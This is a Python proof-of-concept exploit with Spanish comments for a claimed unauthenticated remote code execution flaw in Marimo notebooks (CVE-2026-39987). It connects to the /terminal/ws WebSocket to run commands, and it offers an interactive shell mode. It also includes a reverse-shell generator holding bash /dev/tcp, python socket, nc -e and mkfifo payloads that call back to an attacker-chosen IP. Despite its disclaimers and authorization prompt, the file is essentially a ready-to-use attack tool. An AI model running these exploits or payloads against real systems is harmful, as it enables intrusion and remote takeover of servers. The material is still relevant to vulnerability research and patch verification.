README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)
PoC de explotación - Conecta a /terminal/ws sin autenticación
⚠️ ADVERTENCIA: Este script es SOLO para fines educativos y pruebas autorizadas.
El uso no autorizado es ILEGAL. El autor no se hace responsable.
Author: Security Researcher
Date: 2026-04-13
Severity: CRITICAL
CVSS: 9.3
Uso: python CVE-2026-39987_PoC.py <target> <command>
Ejemplo: python CVE-2026-39987_PoC.py http://localhost:8080 "id"
"""
import asyncio
import websockets
import json
import sys
import argparse
import requests
from urllib.parse import urlparse, urljoin
import ssl
import warnings
warnings.filterwarnings("ignore")
# Colores para output
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
BOLD = '\033[1m'
END = '\033[0m'
def print_banner():
banner = f"""
{Colors.RED}{Colors.BOLD}
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket) ║
║ Critical | CVSS: 9.3 | Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
{Colors.END}
"""
print(banner)
def check_target(target_url):
"""Verifica si el objetivo es vulnerable (detección pasiva)"""
print(f"{Colors.CYAN}[*] Verificando objetivo...{Colors.END}")
# Normalizar URL
if not target_url.startswith(('http://', 'https://')):
target_url = 'http://' + target_url
target_url = target_url.rstrip('/')
# Verificar favicon
try:
r = requests.get(
urljoin(target_url, "favicon.ico"),
timeout=8,
verify=False
)
if r.status_code == 200:
print(f"{Colors.GREEN}[+] Favicon encontrado{Colors.END}")
else:
print(f"{Colors.YELLOW}[!] Favicon no encontrado (aún puede ser vulnerable){Colors.END}")
except:
print(f"{Colors.YELLOW}[!] No se pudo verificar favicon{Colors.END}")
# Verificar versión
try:
r = requests.get(
urljoin(target_url, "api/version"),
timeout=8,
verify=False
)
if r.status_code == 200:
import re
match = re.search(r'(0\.[0-9]+\.[0-9]+)', r.text)
if match:
version = match.group(1)
print(f"{Colors.GREEN}[+] Versión detectada: {version}{Colors.END}")
from packaging.version import Version
if Version(version) < Version("0.23.0"):
print(f"{Colors.RED}[!] Versión VULNERABLE (< 0.23.0){Colors.END}")
else:
print(f"{Colors.GREEN}[✓] Versión SEGURA (>= 0.23.0){Colors.END}")
return False
else:
print(f"{Colors.YELLOW}[!] No se pudo extraer versión{Colors.END}")
else:
print(f"{Colors.YELLOW}[!] Endpoint /api/version no disponible{Colors.END}")
except:
print(f"{Colors.YELLOW}[!] No se pudo verificar versión{Colors.END}")
return True # Asumir vulnerable si no se puede verificar
async def exploit_websocket(target_url, command, interactive=False):
"""
Explota el WebSocket de Marimo
Args:
target_url: URL del objetivo (http://...)
command: Comando a ejecutar
interactive: Modo interactivo (shell persistente)
"""
# Convertir HTTP a WS
parsed = urlparse(target_url)
if parsed.scheme == 'https':
ws_scheme = 'wss'
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
else:
ws_scheme = 'ws'
ssl_context = None
ws_url = f"{ws_scheme}://{parsed.netloc}/terminal/ws"
print(f"{Colors.CYAN}[*] Conectando a: {ws_url}{Colors.END}")
try:
# Conectar al WebSocket
if ssl_context:
async with websockets.connect(ws_url, ssl=ssl_context) as websocket:
return await handle_connection(websocket, command, interactive, target_url)
else:
async with websockets.connect(ws_url) as websocket:
return await handle_connection(websocket, command, interactive, target_url)
except websockets.exceptions.InvalidStatusCode as e:
print(f"{Colors.RED}[-] Error de conexión: Código {e.status_code}{Colors.END}")
return False
except ConnectionRefusedError:
print(f"{Colors.RED}[-] Conexión rechazada. ¿El servicio está corriendo?{Colors.END}")
return False
except Exception as e:
print(f"{Colors.RED}[-] Error: {str(e)}{Colors.END}")
return False
async def handle_connection(websocket, command, interactive, target_url):
"""Maneja la conexión WebSocket"""
try:
# Recibir mensaje de bienvenida
welcome = await asyncio.wait_for(websocket.recv(), timeout=5)
print(f"{Colors.GREEN}[+] WebSocket conectado exitosamente{Colors.END}")
print(f"{Colors.CYAN}[*] Bienvenida: {welcome[:100]}{Colors.END}")
if interactive:
print(f"\n{Colors.GREEN}{Colors.BOLD}[+] Shell interactiva obtenida!{Colors.END}")
print(f"{Colors.YELLOW}[!] Escribe 'exit' para salir{Colors.END}")
print(f"{Colors.YELLOW}[!] Comandos disponibles: cualquiera del sistema{Colors.END}\n")
while True:
# Pedir comando al usuario
cmd = input(f"{Colors.GREEN}marimo-shell>{Colors.END} ").strip()
if cmd.lower() in ['exit', 'quit']:
print(f"{Colors.CYAN}[*] Cerrando conexión...{Colors.END}")
break
if not cmd:
continue
# Enviar comando
payload = json.dumps({
"type": "exec",
"command": cmd
})
await websocket.send(payload)
# Recibir resultado
try:
result = await asyncio.wait_for(websocket.recv(), timeout=10)
print(result)
print() # Línea en blanco
except asyncio.TimeoutError:
print(f"{Colors.RED}[-] Timeout - No se recibió respuesta{Colors.END}\n")
else:
# Modo comando único
print(f"{Colors.CYAN}[*] Ejecutando comando: {command}{Colors.END}")
# Enviar comando
payload = json.dumps({
"type": "exec",
"command": command
})
await websocket.send(payload)
# Recibir resultado
try:
result = await asyncio.wait_for(websocket.recv(), timeout=15)
print(f"\n{Colors.GREEN}[+] Resultado:{Colors.END}")
print(f"{Colors.WHITE}{'='*60}{Colors.END}")
print(result)
print(f"{Colors.WHITE}{'='*60}{Colors.END}")
return True
except asyncio.TimeoutError:
print(f"{Colors.RED}[-] Timeout - No se recibió respuesta{Colors.END}")
return False
except asyncio.TimeoutError:
print(f"{Colors.RED}[-] Timeout esperando bienvenida{Colors.END}")
return False
except Exception as e:
print(f"{Colors.RED}[-] Error en la comunicación: {str(e)}{Colors.END}")
return False
def reverse_shell_payload(ip, port):
"""Genera payloads para reverse shell"""
payloads = [
f"bash -i >& /dev/tcp/{ip}/{port} 0>&1",
f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
f"nc -e /bin/sh {ip} {port}",
f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f"
]
return payloads[0] # Devolver bash reverse shell
def main():
parser = argparse.ArgumentParser(
description='CVE-2026-39987 - Marimo Pre-Auth RCE PoC',
epilog='Ejemplos:\n python CVE-2026-39987_PoC.py http://target.com:8080 "id"\n python CVE-2026-39987_PoC.py http://target.com:8080 -i\n python CVE-2026-39987_PoC.py http://target.com:8080 --revshell 10.0.0.1 4444',
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('target', help='URL del objetivo (ej: http://localhost:8080)')
parser.add_argument('command', nargs='?', help='Comando a ejecutar (opcional si se usa -i)')
parser.add_argument('-i', '--interactive', action='store_true', help='Modo interactivo (shell persistente)')
parser.add_argument('--revshell', nargs=2, metavar=('IP', 'PORT'), help='Generar reverse shell (IP y puerto)')
parser.add_argument('--no-check', action='store_true', help='Saltar verificación de vulnerabilidad')
args = parser.parse_args()
# Mostrar banner
print_banner()
# ADVERTENCIA
print(f"{Colors.RED}{Colors.BOLD}[!] ADVERTENCIA: Este script es solo para pruebas autorizadas{Colors.END}")
print(f"{Colors.RED}[!] El uso no autorizado es ILEGAL{Colors.END}\n")
response = input(f"{Colors.YELLOW}¿Tienes autorización para probar este objetivo? (yes/no): {Colors.END}")
if response.lower() != 'yes':
print(f"{Colors.RED}[-] Saliendo...{Colors.END}")
sys.exit(0)
# Verificar objetivo
if not args.no_check:
if not check_target(args.target):
print(f"{Colors.RED}[-] El objetivo parece estar parchado. Saliendo...{Colors.END}")
sys.exit(1)
else:
print(f"{Colors.YELLOW}[!] Saltando verificación de vulnerabilidad{Colors.END}")
# Procesar reverse shell si se solicita
if args.revshell:
ip, port = args.revshell
command = reverse_shell_payload(ip, port)
print(f"{Colors.CYAN}[*] Reverse shell configurada: {ip}:{port}{Colors.END}")
print(f"{Colors.YELLOW}[!] Asegúrate de tener netcat escuchando: nc -lvnp {port}{Colors.END}")
args.interactive = False
elif args.interactive:
command = None
elif not args.command:
parser.print_help()
sys.exit(1)
else:
command = args.command
# Ejecutar exploit
print(f"\n{Colors.CYAN}[*] Iniciando explotación...{Colors.END}")
try:
asyncio.run(exploit_websocket(args.target, command, args.interactive))
except KeyboardInterrupt:
print(f"\n{Colors.YELLOW}[!] Interrumpido por el usuario{Colors.END}")
sys.exit(0)
if __name__ == "__main__":
# Verificar dependencias
try:
import websockets
import packaging.version
except ImportError:
print(f"{Colors.RED}[-] Dependencias faltantes. Instala con:{Colors.END}")
print(f"{Colors.CYAN}pip install websockets packaging requests{Colors.END}")
sys.exit(1)
main()